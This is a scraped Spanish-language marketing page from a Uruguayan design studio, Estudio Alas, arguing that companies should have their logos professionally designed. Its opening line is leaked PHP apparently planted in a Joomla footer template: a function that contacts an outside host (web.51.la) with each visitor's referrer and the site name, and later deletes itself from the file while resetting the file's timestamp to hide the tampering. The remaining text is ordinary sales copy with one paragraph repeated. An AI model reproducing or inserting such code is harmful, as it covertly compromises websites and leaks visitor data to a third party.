check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Diseño de Logos, logotipos desde Uruguay


Muchas empresas improvisan su logotipo en el momento de su creación. Buscan “inspiración por Internet” o simplemente intentan plasmar con un lápiz y un papel aquella idea que les ronda por la cabeza. Sólo hay un problema. Por lo general son empresarios, no diseñadores gráficos. La importancia del logotipo en la empresa será crucial en muchos casos para el reconocimiento de nuestra empresa.

Debido a la creciente necesidad de identificación por parte de las empresas a través de los logotipos y las marcas, la creación de una estrategia de identidad visual ha dejado de ser un tema exclusivo de las grandes multinacionales para formar parte de los pilares básicos del plan empresarial a la hora de crear cualquier entidad o marca.

Todo producto o empresa nueva que surge en la actualidad precisa al menos de un logo o logotipo que la identifique gráficamente como recurso básico ante sus competidores, los clientes, los usuarios, o el público objetivo, entre otros.

Así como funciona una marca para un producto, un logotipo es para una empresa como la firma para una persona. Le proporciona identidad, diferenciación, seriedad y legitimidad.Tanto si funciona localmente como a gran escala, el logotipo constituye el mínimo recurso básico de identificación visual y de reconocimiento de la empresa por parte de los usuarios.

Muchas compañías creen que lo importante para triunfar en el mercado es tener productos de buena calidad, productos originales o tener los mejores y más prestigiosos profesionales de su rubro; y todo esto es cierto sin duda alguna, pero sólo es cierto si se cuenta con un buen diseño de logotipo que presente a esta compañía como una compañía con productos de buena calidad, originales o con los mejores profesionales. Sin un adecuado logotipo, todo lo que una compañía se esfuerce en ser la mejor se disolverá en la inmensidad del mercado: sin un logotipo que diga “aquí estamos, somos los mejores” nadie lo sabrá nunca, todo el esfuerzo que la compañía ha puesto en ser eficiente será en vano, si esto no puede ser reconocido por los potenciales clientes.

Muchas compañías creen que lo importante para triunfar en el mercado es tener productos de buena calidad, productos originales o tener los mejores y más prestigiosos profesionales de su rubro; y todo esto es cierto sin duda alguna, pero sólo es cierto si se cuenta con un buen diseño de logotipo que presente a esta compañía como una compañía con productos de buena calidad, originales o con los mejores profesionales. Sin un adecuado logotipo, todo lo que una compañía se esfuerce en ser la mejor se disolverá en la inmensidad del mercado: sin un logotipo que diga “aquí estamos, somos los mejores” nadie lo sabrá nunca, todo el esfuerzo que la compañía ha puesto en ser eficiente será en vano, si esto no puede ser reconocido por los potenciales clientes.

Es importante resolver la adecuación de sus logotipos a todas las aplicaciones a realizar en los diferentes soportes de comunicación de las empresas. De este modo, se proporcionan soluciones creativas, así como una homogénea coordinación de todos los canales de comuncación a cualquier nivel, creandose una imagen identitaria fuerte y coherente.

Es necesario realizar el diseño de logos o logotipos para las empresas, entre otros, cuando:

  1. Un producto, servicio, o entidad nueva se pone en marcha.
  2. Una empresa u organización se fusiona con otra.
  3. Una empresa diversifica su gama de productos.
  4. Una empresa necesita de un rediseño.
  5. Los productos son más famosos que la empresa.
  6. Se decide sacar un nuevo producto o servicio.

Cada vez más las empresas toman en consideración la importancia que trae consigo una planificación de la estrategia de comunicación a través de los programas de intervención creados sobre la base de la identidad visual corporativa. Para lo cual es imprescindible el desarrollo y diseño de un buen logo, logotipo o marca que identifique acertadamente a la empresa.

Evite dolores de cabeza

Muchas personas se preguntan por qué gastar dinero en un logotipo si lo puede hacer cualquiera y efectivamente en muchos casos así es. Muy usual es encontrarse con esa respuesta al recibir trabajos de diseño, y al ser consultados por la procedencia del logo o logotipo es muy común escuchar “bueno lo hizo un amigo, un familiar, alguien que tenía alguna noción de diseño o de plano ellos mismos” y al pedir los diseños finales, variantes o archivos fuente para utilizarlos en el diseño solicitado, se les prende una ampolleta con un gran signo de interrogación y nos dan a entender que estuviéramos hablando en chino.

Como en todo trabajo ahí requerimientos y requisitos que se deben cumplir para llevar a cabo los procesos de producción o elaboración de los productos, y el área gráfica no escapa a esto.
Técnicamente un diseño en su elaboración debe cumplir una serie de requisitos para ser usados en una u otra plataforma, pudiendo ser estas digitales, papelería o impresión digital (gigantografias, pendones, y otras superficies).

En la elaboración de un diseño nos encontramos con muchos elementos que lo pueden conformar definamos tres elementos comunes:

  • El logo o logotipo.
  • El contenido a modo de texto, es decir toda la información que este contendrá.
  • Imágenes que se usaran.

Bien centrándonos en lo que nos convoca, el logotipo siempre será solicitado por la empresa o diseñador particular que esté desarrollando ese proyecto. Muchas veces nos encontramos con el problema que ese logotipo no existe o si existe es una imagen pequeña con resoluciones no aptas para su uso. Entonces comienzan los dolores de cabeza pues el cliente no querrá invertir en la creación del logotipo o querrá que se lo hagan gratis como parte del diseño que está pagando, pues bien aquí debemos decir que una cosa no tiene nada que ver con la otra, el logotipo es una cosa y un diseño x para lo que sea hecho es otra, el logotipo es un elemento del diseño x y no parte de la creatividad con la que se trate este. El logotipo es una parte fundamental de cualquier diseño pues nos da a entender de quien es o a quien pertenece el anuncio o servicio que se promocione en él, y de estar bien posicionado o consolidado este logotipo solo basta mirarlo y ya se sabrá de que se trata, mas allá de la información que este contenga, ya que por asociatividad la marca es relacionada por el público.

Conclusiones

Lo importante de un logotipo es que sea asociado a nuestra empresa. Que cualquiera que lo vea sepa que nosotros estamos detrás y esto no es fácil de conseguir. Está claro que cada empresa cuenta con distintos recursos y no podemos pretender invertir lo mismo en el logotipo que una empresa que tenga un presupuesto 100 veces más que la nuestra pero Internet democratiza mucho el mundo del diseño y existen alternativas para sacar nuestro logotipo a concurso entre distintos diseñadores para elegir el que más nos guste.

El retorno de la inversión de un buen diseño está garantizado y hará que nuestras campañas de promoción sean mucho más efectivas, puesto que nuestro logotipo será la imagen de nuestra empresa también en redes sociales, en nuestra web, etc. donde muchas veces más que una foto, un favicón o un Avatar es lo que nos puede distinguir y ayudar a encontrarnos mejor.

Como podrán darse cuenta un logotipo debe ser hecho como corresponde y con todas las especificaciones a las que en uno u otro momento usted se verá enfrentado a utilizar su logotipo, evite dolores de cabeza, la inversión es absolutamente mínima versus todo el beneficio que obtendrá creando un logotipo de una manera correcta, sus usos son múltiples en el desarrollo de su empresa, publicidad, papelería, vehículos, elementos corporativos, etc. La lista es muy amplia y vera que en algún momento el no hacer su logotipo como corresponde le pasara la cuenta, hágase asesorar y desarrolle su logotipo con especialistas, en Estudio Alas tenemos nuestra área grafica totalmente disponible para resolver todas sus inquietudes y ayudarlo a desarrollar su logotipo o imagen corporativa de la mejor forma posible y a costos muy convenientes  dentro del mercado.